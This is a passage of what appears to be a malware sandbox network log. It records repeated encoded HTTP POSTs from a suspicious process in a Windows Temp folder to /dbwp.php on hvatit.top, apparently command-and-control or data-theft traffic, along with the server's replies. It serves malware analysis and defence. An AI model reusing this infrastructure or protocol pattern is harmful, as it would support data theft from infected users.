                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:04.005518913 CEST | 2560 | OUT | Data Raw: 5a 5c 5c 51 5f 5f 50 5c 5d 5f 54 57 54 51 5b 55 5a 54 59 5e 52 56 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\\Q__P\]_TWTQ[UZTY^RVTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-3!=)<U"-+,/+#$S');3%/_$[:W(+<48!]'/Z,
                                                        Aug 31, 2024 09:33:04.332037926 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:04.463614941 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        64 | 192.168.2.4 | 49801 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:04.593728065 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:04.942981005 CEST | 2560 | OUT | Data Raw: 5a 5f 59 55 5a 5c 50 50 5d 5f 54 57 54 5a 5b 51 5a 57 59 5d 52 53 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z_YUZ\PP]_TWTZ[QZWY]RST]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.X315<9 T!. 9'_7+;3#''0[=+#<Z+/?!]'/Z,-
                                                        Aug 31, 2024 09:33:05.282617092 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:05.411982059 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        65 | 192.168.2.4 | 49802 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:05.511956930 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        66 | 192.168.2.4 | 49803 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:05.540561914 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:05.896106958 CEST | 2560 | OUT | Data Raw: 5f 58 59 51 5a 5c 55 55 5d 5f 54 57 54 5c 5b 54 5a 51 59 5e 52 53 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _XYQZ\UU]_TWT\[TZQY^RST\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-3":=),T5,_:7#+(V'9;'%#^$-"U(+</;!]'/Z,5
                                                        Aug 31, 2024 09:33:06.233802080 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:06.369489908 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        67 | 192.168.2.4 | 49804 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:06.490353107 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:06.849159002 CEST | 2560 | OUT | Data Raw: 5f 5f 59 54 5a 5e 55 55 5d 5f 54 57 54 5e 5b 54 5a 51 59 59 52 52 54 52 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: __YTZ^UU]_TWT^[TZQYYRRTRQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-'W:?:+!>(_97+U3:'$Z'>&U*;?/'W8!]'/Z,=
                                                        Aug 31, 2024 09:33:07.155083895 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:07.352502108 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        68 | 192.168.2.4 | 49805 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:07.476170063 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:07.833610058 CEST | 2560 | OUT | Data Raw: 5a 5d 59 50 5a 5d 50 56 5d 5f 54 57 54 51 5b 56 5a 57 59 5b 52 56 54 53 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z]YPZ]PV]_TWTQ[VZWY[RVTSQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-'"6+R6=$.'[7+''+0%$0=>U(+(<#R;?!]'/Z,
                                                        Aug 31, 2024 09:33:08.318018913 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:08.318532944 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ
                                                        Aug 31, 2024 09:33:08.318726063 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        69 | 192.168.2.4 | 49806 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:08.446336031 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:08.802340984 CEST | 2560 | OUT | Data Raw: 5a 5c 59 52 5a 5e 50 52 5d 5f 54 57 54 5a 5b 51 5a 52 59 5a 52 57 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\YRZ^PR]_TWTZ[QZRYZRWTYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-&1%=97">4]-/'X#(4S'\;$6($!++;=<;R,?!]'/Z,-
                                                        Aug 31, 2024 09:33:09.130804062 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:09.267637014 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        70 | 192.168.2.4 | 49807 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:09.402483940 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:09.755610943 CEST | 2560 | OUT | Data Raw: 5a 5e 59 53 5a 5a 55 55 5d 5f 54 57 54 5f 5b 57 5a 57 59 5c 52 5d 54 5e 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z^YSZZUU]_TWT_[WZWY\R]T^Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.X3+$".7:<43':4V$;_'.R+;<(/!]'/Z,
                                                        Aug 31, 2024 09:33:10.086746931 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:10.223743916 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        71 | 192.168.2.4 | 49808 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:10.351799011 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        72 | 192.168.2.4 | 49809 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:10.542712927 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:10.896100044 CEST | 1436 | OUT | Data Raw: 5f 5f 59 53 5f 5e 50 57 5d 5f 54 57 54 51 5b 50 5a 53 59 59 52 5c 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: __YS_^PW]_TWTQ[PZSYYR\T_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-01-+_'#-(_:' <'*#&&'$1?+0<Z'V//!]'/Z,
                                                        Aug 31, 2024 09:33:11.220567942 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:11.349513054 CEST | 308 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 23 1f 33 28 26 56 23 05 25 0b 3e 3c 39 1d 27 0e 2c 07 3b 31 0b 07 29 3a 34 02 2b 3a 2c 12 25 2d 27 07 33 38 04 54 25 06 30 1e 25 24 21 5b 07 10 21 03 32 3d 38 02 3b 05 22 13 32 0e 0c 01 34 31 36 5f 2a 5b 31 59 36 3b 3e 02 27 38 3d 08 2e 39 3e 1e 2a 2d 37 5f 2a 28 3f 06 25 12 2b 50 00 12 25 0a 25 11 12 57 20 2e 21 01 21 16 3f 1f 24 1b 2f 5e 20 15 3f 04 3c 01 3d 52 27 02 2e 12 20 30 3a 02 25 1c 03 05 3e 3d 2c 08 3e 3c 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: #3(&V#%><9',;1):4+:,%-'38T%0%$![!2=8;"2416_*[1Y6;>'8=.9>*-7_*(?%+P%%W .!!?$/^ ?<=R'. 0:%>=,><&].#V6YV


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        73 | 192.168.2.4 | 49810 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:10.662220955 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:11.021065950 CEST2560OUTData Raw: 5a 5b 5c 54 5f 59 50 54 5d 5f 54 57 54 5b 5b 54 5a 53 59 5e 52 5d 54 5b 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z[\T_YPT]_TWT[[TZSY^R]T[Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.]$1:B(:$R"Z9?;^"+'')4Q'?[$.9*83(<//!]'/Z,)
                                                        Aug 31, 2024 09:33:11.322673082 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:11.455324888 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        74 | 192.168.2.4 | 49811 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:11.584130049 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:11.942998886 CEST | 2552 | OUT | Data Raw: 5f 59 5c 52 5f 5f 50 53 5d 5f 54 57 54 58 5b 57 5a 54 59 5a 52 53 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _Y\R__PS]_TWTX[WZTYZRST]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-&!6<">4^-,0"+0 V'&?3=&W<;??< .?!]'/Z,)
                                                        Aug 31, 2024 09:33:12.256383896 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:12.455229044 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        75 | 192.168.2.4 | 49812 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:12.583995104 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:12.942960978 CEST | 2560 | OUT | Data Raw: 5a 59 59 54 5a 5c 50 5d 5d 5f 54 57 54 50 5b 53 5a 55 59 53 52 52 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZYYTZ\P]]_TWTP[SZUYSRRT\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Z&12A(:#!> _-'#+70 3&?3.>(+#](;V;!]'/Z,
                                                        Aug 31, 2024 09:33:13.276149988 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:13.470848083 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        76 | 192.168.2.4 | 49813 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:13.605511904 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:13.958563089 CEST | 2560 | OUT | Data Raw: 5f 5f 5c 56 5a 5d 50 5c 5d 5f 54 57 54 51 5b 56 5a 54 59 5e 52 55 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: __\VZ]P\]_TWTQ[VZTY^RUTYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Z3!2E=*#".[,?'^ ;&)<V&5'3T*8<?8//!]'/Z,
                                                        Aug 31, 2024 09:33:14.289293051 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:14.489698887 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        77 | 192.168.2.4 | 49814 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:14.615854979 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:14.974224091 CEST | 2560 | OUT | Data Raw: 5f 5f 59 5f 5f 59 55 56 5d 5f 54 57 54 5e 5b 54 5a 55 59 5b 52 50 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: __Y__YUV]_TWT^[TZUY[RPTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.]&2-?8! [.#;+3*;'''-*+ (R,/!]'/Z,=
                                                        Aug 31, 2024 09:33:15.287045956 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:15.485439062 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        78 | 192.168.2.4 | 49815 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
